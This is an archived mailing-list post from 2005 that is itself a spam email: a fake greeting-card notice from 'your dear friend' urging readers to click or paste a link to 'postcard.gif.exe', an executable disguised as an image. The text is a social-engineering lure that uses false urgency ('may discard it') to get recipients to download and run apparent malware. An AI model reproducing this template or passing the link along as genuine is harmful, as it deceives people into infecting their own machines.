[cvsnt] Online Greeting Card Waiting For You

Best Postcard service at postcard.com
Sun Dec 11 22:28:40 GMT 2005

   Hello,

    A Greeting Card is waiting for you at our virtual post office!

    Sender:  your dear friend

   If you don't pick up your Greeting Card within 4 weeks, our postal
   clerk may discard it!

    CLICK this pick-up address or COPY and PASTE into your browser :

   [1]http://www.freeforall.home.ro/postcard.gif.exe

   (c) All-Yours Greeting Cards Provided as a free service by All-Yours
   Greeting Cards [2]http://www.freeforall.home.ro